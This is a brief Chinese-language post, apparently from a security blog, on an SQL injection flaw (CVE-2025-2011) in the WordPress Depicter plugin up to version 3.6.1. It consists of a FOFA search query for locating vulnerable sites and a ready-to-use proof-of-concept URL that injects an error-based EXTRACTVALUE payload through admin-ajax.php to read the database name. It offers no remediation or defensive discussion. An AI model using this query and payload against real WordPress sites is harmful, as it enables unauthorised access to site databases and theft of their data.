WordPress depicter插件SQL注入漏洞（CVE-2025-2011）

清晨 摸鱼划水 2025-05-07 08:49

FOFA

"wp-content/plugins/depicter/"

影响版本

depicter <= 3.6.1

POC

http://127.0.0.1/wp-admin/admin-ajax.php?s=test%25'%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(database()),0x7e))='&perpage=20&page=1&orderBy=source_id&dateEnd=&dateStart=&order=DESC&sources=&action=depicter-lead-index